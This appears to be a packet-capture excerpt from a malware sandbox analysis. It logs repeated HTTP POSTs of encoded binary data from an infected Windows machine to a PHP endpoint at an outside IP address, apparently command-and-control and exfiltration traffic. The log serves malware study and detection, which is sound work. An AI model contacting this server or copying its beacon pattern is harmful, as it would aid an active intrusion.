Jan 3, 2025 18:27:16.350332022 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:16 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1400 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 56 4a 7d 58 6c 53 59 44 7b 4c 59 59 7f 4f 55 01 7d 01 60 53 7e 60 76 51 6e 70 60 00 6a 71 6c 4b 60 5d 53 0c 7b 62 7d 44 76 58 78 02 69 5b 78 01 55 4b 72 50 74 5c 67 07 68 61 6a 5f 6b 64 76 0a 78 66 70 0c 69 60 77 49 61 62 75 06 60 07 62 5d 7f 61 75 58 69 0a 67 51 7e 49 5e 5a 76 66 7b 06 7c 5c 7e 59 7e 4e 61 4b 6c 5e 6b 5e 6c 67 73 5c 7b 53 51 01 7a 61 63 5b 78 63 7d 5f 7c 5e 74 00 6c 77 63 5a 7d 04 67 4d 76 62 60 4a 7a 51 41 5b 68 59 67 52 7f 5f 7e 50 75 6c 52 03 6c 6c 74 00 60 5e 66 09 7a 71 5f 05 7d 6c 50 4e 7a 72 79 58 61 05 70 5a 76 5f 74 4f 74 71 7a 50 7e 5d 7a 06 60 5b 7d 01 61 66 7c 09 7f 7c 66 5e 77 6f 73 5d 7f 73 6c 07 78 6f 63 03 7b 4e 66 4a 7c 6d 78 08 77 49 6f 5a 69 62 62 09 6a 43 6c 53 6f 7d 61 5d 7d 61 7d 07 7b 5d 46 51 7f 6c 60 43 6a 63 64 40 7e 49 72 05 7a 6e 7c 5f 79 72 74 03 68 07 6b 00 7e 67 63 0b 7c 59 69 09 7a 4d 68 05 6a 5b 7c 48 76 63 57 51 7b 5c 79 02 75 66 68 03 7d 58 68 4f 7e 58 7d 09 76 62 59 00 7f 5c 79 01 7d 67 76 43 78 66 78 4f 7e 4d 59 04 75 62 75 04 76 71 53 00 7c 4f [TRUNCATED] Data Ascii: VJ}XlSYD{LYYOU}`S~`vQnp`jqlK`]S{b}DvXxi[xUKrPt\ghaj_kdvxfpi`wIabu`b]auXigQ~I^Zvf{\|\~Y~NaKl^k^lgs\{SQzac[xc}_\|^tlwcZ}gMvb`JzQA[hYgR_~PulRllt`^fzq_}lPNzryXapZv_tOtqzP~]z`[}af\|\|f^wos]slxoc{NfJ\|mxwIoZibbjClSo}a]}a}{]FQl`Cjcd@~Irzn\|_yrthk~gc\|YizMhj[\|HvcWQ{\yufh}XhO~X}vbY\y}gvCxfxO~MYubuvqS\|OXH~BR@}YUJv_U{buH~pixI^LygtxmgzrVIxsT\|p\|{wpD}\g@u_VH}RgK\|IhA\|a_vBh{ltwN~zO}\|\|j{_rHvMuOdNtqPC\|Nft\mLu[pRit\|xO\|MhxB{J{prDCR@vg`A}bP~CszmTL~reM`t\|\|^pt}Yrz}gD{bpHOgI}Yg`}{c`~b^wMeyaSIwvtK~HR@fawLgK}r}O\|Ib{vR}]{wrqvqiOr}\|t~wu_sxb_J}`SxYx{Ypy}YxrpxMzA{]NZoYcZj[oNvxI}\|xZdxXmbU\|o\|]Z`aUyXmiUb_z\y\}b`g{ZL~JxYyZwb[MaeQQhoiBw\|lh]cY{lgKxpjIh}\|Ntdc]}LySzSYQa~infSqUPPoowTcIRdeXoTtT~cthm`[QtZUkcHNmFS~cX[p\RebFq[F[iv`~v}vahYkbaLdaTx_h\|p`]a\qwXjZaTHilP]AZbdFVq@iTFnsXUkoYUcXx_\|y]f~^\|J{JK\|r]^tv^ioEP{gVSb_aUPkxp_UPLvjQyD\|\DXb`E[rMc[Liy[cTCZXpxSY]A{oSsAQA[oeEQ~AcUCh}TiZNWRy
Jan 3, 2025 18:27:16.350342035 CET	393	IN	Data Raw: 40 6a 71 65 5e 7d 5d 7b 77 65 6b 70 4a 79 59 55 54 51 00 75 47 51 6e 56 43 54 5a 08 48 6b 62 56 43 51 01 03 77 68 63 01 54 7d 5d 56 5c 64 5b 63 02 70 71 5c 4e 57 58 43 5a 74 71 7b 5c 69 65 08 40 52 7a 6e 56 58 61 07 55 6b 04 09 04 50 5d 61 40 53 Data Ascii: @jqe^}]{wekpJyYUTQuGQnVCTZHkbVCQwhcT}]V\d[cpq\NWXCZtq{\ie@RznVXaUkP]a@SgwNipgYw_r`lLqCxXW]RwJTdVCZYZWnEW\|rb^@l`pUdDVng]otubVslkxZu\|YbbGQp`\Sd^kL\UCoohRnf}zSt\|\DXb`E[rMc[Li}A[XjEZ\oMU}][ol\~^s\|T\|TwqqPno@Xd
Jan 3, 2025 18:27:16.411216974 CET	315	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 384 Expect: 100-continue
Jan 3, 2025 18:27:16.628711939 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:16.628963947 CET	384	OUT	Data Raw: 5b 55 5e 5e 58 5d 50 5a 54 5b 59 5a 5b 5e 57 53 5f 56 5a 5d 52 51 50 48 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: [U^^X]PZT[YZ[^WS_VZ]RQPH_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU%(>!902 B=()%'6%)Q!$#8 Y$_7'Y W()#Y'$X.
Jan 3, 2025 18:27:16.852417946 CET	324	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:16 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 0d 1d 24 13 31 05 2e 1e 29 2f 0d 58 31 30 32 01 21 23 27 04 2e 30 0f 1b 21 5a 39 1c 25 5d 30 57 28 04 2d 19 2b 0a 3e 0e 37 3e 21 56 3f 1a 28 5d 03 10 39 5d 28 2e 2b 11 3e 10 03 15 2d 34 2c 02 30 0e 3c 5b 2a 33 2d 13 32 2f 3d 0c 21 2e 2c 0b 28 20 21 1d 26 2b 3b 03 2b 09 2b 5a 24 3d 20 54 0b 17 27 55 33 20 0d 13 26 28 2e 05 3d 24 20 5d 33 3a 03 53 22 2c 0c 53 20 17 01 07 38 30 2a 0e 30 3b 21 54 3e 2e 24 0e 25 14 31 02 33 2b 2e 5c 23 0f 28 55 0d 34 57 50 Data Ascii: $1.)/X102!#'.0!Z9%]0W(-+>7>!V?(]9](.+>-4,0<[3-2/=!.,( !&+;++Z$= T'U3 &(.=$ ]3:S",S 800;!T>.$%13+.\#(U4WP
Jan 3, 2025 18:27:16.852859020 CET	315	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 384 Expect: 100-continue
Jan 3, 2025 18:27:17.070328951 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:17.070477009 CET	384	OUT	Data Raw: 5e 57 5b 5c 58 5c 50 51 54 5b 59 5a 5b 50 57 5b 5f 55 5a 5c 52 51 50 46 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: ^W[\X\PQT[YZ[PW[_UZ\RQPF_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU%<>1"/2#>]>X$"1Y"5=V# [$9,' W?9#Y'$X.
Jan 3, 2025 18:27:17.293036938 CET	324	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:16 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 0d 1d 27 04 26 3b 32 10 3e 59 23 5a 32 30 3e 07 22 30 24 5f 2f 09 2a 0b 21 2c 04 01 31 15 3c 57 3c 04 2e 40 28 1d 0f 1f 23 2e 3a 0a 3f 1a 28 5d 03 10 39 11 3f 13 28 02 3e 3e 07 5e 2d 37 0e 05 27 51 28 1f 2b 33 0f 54 27 3c 2e 53 35 2d 3b 1e 2a 30 39 58 27 05 3c 14 2b 56 37 10 30 07 20 54 0b 17 24 0f 33 09 20 06 26 16 00 00 28 37 28 58 26 2a 2d 50 22 12 2a 19 34 39 3f 03 3b 0e 3a 0a 30 2b 36 0a 29 58 2b 1d 31 3a 25 00 30 3b 2e 5c 23 0f 28 55 0d 34 57 50 Data Ascii: '&;2>Y#Z20>"0$_/!,1<W<.@(#.:?(]9?(>>^-7'Q(+3T'<.S5-;09X'<+V70 T$3 &(7(X&-P"49?;:0+6)X+1:%0;.\#(U4WP
Jan 3, 2025 18:27:17.334528923 CET	316	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 1452 Expect: 100-continue
Jan 3, 2025 18:27:17.552088976 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:17.552213907 CET	1452	OUT	Data Raw: 5b 53 5e 59 58 59 50 5c 54 5b 59 5a 5b 55 57 5f 5f 5c 5a 5a 52 52 50 49 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: [S^YXYP\T[YZ[UW__\ZZRRPI_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU%(X!6:1?#>][07&1?5$-V77'<@'<?9#Y'$X.)
Jan 3, 2025 18:27:17.941389084 CET	324	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:17 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 0d 1d 24 58 26 5d 2a 5d 2a 06 30 00 26 55 21 13 21 0e 3c 59 2f 20 07 1c 22 3c 26 00 25 2b 20 55 2b 13 29 1c 29 30 32 0e 37 58 3d 1f 29 20 28 5d 03 10 39 13 3c 04 37 5c 2a 58 39 5f 2c 27 30 03 24 09 3b 03 2a 0a 3d 54 25 2f 25 0c 22 3d 20 0f 2a 0d 0f 1d 27 3b 3b 04 3f 09 20 03 27 3d 20 54 0b 17 24 0f 27 1e 20 06 26 06 07 5a 3d 09 33 03 30 3a 31 57 23 2c 35 08 22 29 38 5d 2c 23 25 1f 27 38 3d 57 29 2e 28 0c 25 04 0b 00 27 01 2e 5c 23 0f 28 55 0d 34 57 50 Data Ascii: $X&]]0&U!!<Y/ "<&%+ U+))027X=) (]9<7\X9_,'0$;=T%/%"= *';;? '= T$' &Z=30:1W#,5")8],#%'8=W).(%'.\#(U4WP

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:16.489058018 CET	316	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2576 Expect: 100-continue
Jan 3, 2025 18:27:16.846556902 CET	2576	OUT	Data Raw: 5e 50 5e 51 5d 5c 50 59 54 5b 59 5a 5b 56 57 5b 5f 54 5a 55 52 57 50 40 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: ^P^Q]\PYT[YZ[VW[_TZURWP@_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU&A(-)_"*#&,+)(6Y%4-X'?1S6948<['$0Y,W)9#Y'$X.%
Jan 3, 2025 18:27:17.195885897 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:17.335419893 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:17.553047895 CET	316	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2576 Expect: 100-continue
Jan 3, 2025 18:27:17.909079075 CET	2576	OUT	Data Raw: 5b 55 5e 51 58 57 55 5b 54 5b 59 5a 5b 55 57 5d 5f 54 5a 5b 52 51 50 40 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: [U^QXWU[T[YZ[UW]_TZ[RQP@_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU&+..!:&<8E)(.3'5\2?Q6* ; $98'?/?#Y'$X.)
Jan 3, 2025 18:27:18.231653929 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:18.362765074 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:18.705390930 CET	316	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2568 Expect: 100-continue
Jan 3, 2025 18:27:19.049592018 CET	2568	OUT	Data Raw: 5e 57 5b 5d 5d 5e 50 51 54 5b 59 5a 5b 57 57 59 5f 5c 5a 58 52 51 50 44 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: ^W[]]^PQT[YZ[WWY_\ZXRQPD_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU%<*" U2<'(8607%\&%V!4-!+?39C$?(R?#Y'$X.)
Jan 3, 2025 18:27:19.413558960 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:19.552155018 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:19.775408983 CET	340	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2576 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:20.155221939 CET	2576	OUT	Data Raw: 5b 56 5e 51 58 56 50 5a 54 5b 59 5a 5b 5f 57 53 5f 56 5a 59 52 57 50 45 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: [V^QXVPZT[YZ[_WS_VZYRWPE_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU%<>&!),2;)+=0$*2&57)W784X$<D&,;+9#Y'$X.
Jan 3, 2025 18:27:20.467248917 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:20.594777107 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:20.975971937 CET	340	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2576 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:21.330811977 CET	2576	OUT	Data Raw: 5e 55 5b 5c 58 59 55 58 54 5b 59 5a 5b 5f 57 5a 5f 57 5a 54 52 53 50 47 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: ^U[\XYUXT[YZ[_WZ_WZTRSPG_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU&+5,%<%$&)"V ([39,D0S+9#Y'$X.
Jan 3, 2025 18:27:21.661705971 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:21.791558027 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:22.961816072 CET	340	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2052 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:23.315226078 CET	2052	OUT	Data Raw: 5b 5c 5b 5a 58 5a 55 5b 54 5b 59 5a 5b 5e 57 5a 5f 55 5a 5e 52 50 50 48 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: [\[ZXZU[T[YZ[^WZ_UZ^RPPH_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU%+"#);1,()%'$9\%,!W"&78,Y'9$Y,R?#Y'$X.
Jan 3, 2025 18:27:23.664324045 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:23.799797058 CET	380	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:23 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0d 1d 24 10 32 3b 07 01 3d 3c 2f 5b 25 0d 21 1c 36 20 0a 17 2f 0e 32 45 21 02 22 03 26 28 2c 1e 28 3d 03 1c 2b 33 2e 09 34 2e 0b 1f 2b 1a 28 5d 03 10 3a 00 3d 2d 0d 1f 29 00 25 5e 3a 09 09 5f 33 37 3f 05 3e 0a 3d 56 31 02 3e 52 36 3e 2f 53 28 23 3a 02 24 05 38 5e 3c 0e 3f 12 27 17 20 54 0b 17 24 09 27 56 33 10 26 2b 25 11 29 51 3f 03 33 39 2d 1a 36 02 0c 1b 37 29 23 03 3b 1e 22 0a 25 38 07 52 2a 58 2c 0b 26 3a 3e 1e 26 2b 2e 5c 23 0f 28 55 0d 34 57 50 Data Ascii: $2;=</[%!6 /2E!"&(,(=+3.4.+(]:=-)%^:_37?>=V1>R6>/S(#:$8^<?' T$'V3&+%)Q?39-67)#;"%8R*X,&:>&+.\#(U4WP

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:26.066565990 CET	340	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2576 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:26.426410913 CET	2576	OUT	Data Raw: 5e 57 5b 5d 5d 59 55 58 54 5b 59 5a 5b 51 57 5f 5f 54 5a 55 52 5d 50 49 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: ^W[]]YUXT[YZ[QW__TZUR]PI_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU&B).!\023>].Z$'=[&Y)"B>#+,$) E'+)#Y'$X.9
Jan 3, 2025 18:27:26.747186899 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:26.875880957 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:27.362986088 CET	340	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2576 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:27.721470118 CET	2576	OUT	Data Raw: 5e 51 5b 5d 58 59 50 59 54 5b 59 5a 5b 54 57 53 5f 54 5a 5f 52 57 50 49 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: ^Q[]XYPYT[YZ[TWS_TZ_RWPI_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU&C<.)!*8T$< =8.^%4%[25544;+0$/;?9#Y'$X.-
Jan 3, 2025 18:27:28.047082901 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:28.176275015 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:28.823260069 CET	340	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2052 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:29.174546003 CET	2052	OUT	Data Raw: 5e 57 5e 59 5d 5e 50 5a 54 5b 59 5a 5b 52 57 5a 5f 54 5a 54 52 52 50 44 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: ^W^Y]^PZT[YZ[RWZ_TZTRRPD_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU&@(>>": % =("[3&&"$!(7$_+&,#))#Y'$X.5
Jan 3, 2025 18:27:29.508697987 CET	25	IN	HTTP/1.1 100 Continue
